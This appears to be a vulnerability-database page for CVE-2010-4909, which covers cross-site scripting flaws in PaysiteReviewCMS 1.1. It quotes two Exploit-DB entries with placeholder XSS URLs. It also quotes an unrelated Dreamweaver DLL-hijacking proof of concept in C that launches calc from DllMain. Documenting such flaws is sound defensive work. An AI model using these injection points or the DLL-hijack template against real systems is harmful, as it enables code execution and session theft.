CVE-2010-4909
published 2011-10-08CVE-2010-4909: Multiple cross-site scripting (XSS) vulnerabilities in PaysiteReviewCMS 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) q…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.51%
71.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in PaysiteReviewCMS 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to search.php or the (2) image parameter to image.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mechbunny | paysitereviewcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PaysiteReviewCMS - 'image.php' Cross-Site Scripting
exploitdb·2010-09-14
CVE-2010-4909 PaysiteReviewCMS - 'image.php' Cross-Site Scripting
PaysiteReviewCMS - 'image.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/43213/info
Mechanical Bunny Media PaysiteReviewCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/image.php?image=[XSS]
Exploit-DB
PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting
exploitdb·2010-09-14
CVE-2010-4909 PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting
PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/43213/info
Mechanical Bunny Media PaysiteReviewCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?q=[XSS]
Exploit-DB
Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3132 Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking
Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking
---
/*
# Exploit Title: Adobe Dreamweaver CS5 DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.adobe.com
# Version:
int main()
{
WinExec("calc", SW_NORMAL);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
main();
return 0;
}
No writeups or analysis indexed.
http://packetstormsecurity.org/1009-exploits/mechbunnypsr-xss.txthttp://secunia.com/advisories/41431http://securityreason.com/securityalert/8444http://www.xenuser.org/documents/security/mechbunny_paysitereviewcms_xss.txthttp://packetstormsecurity.org/1009-exploits/mechbunnypsr-xss.txthttp://secunia.com/advisories/41431http://securityreason.com/securityalert/8444http://www.xenuser.org/documents/security/mechbunny_paysitereviewcms_xss.txt
2011-10-08
Published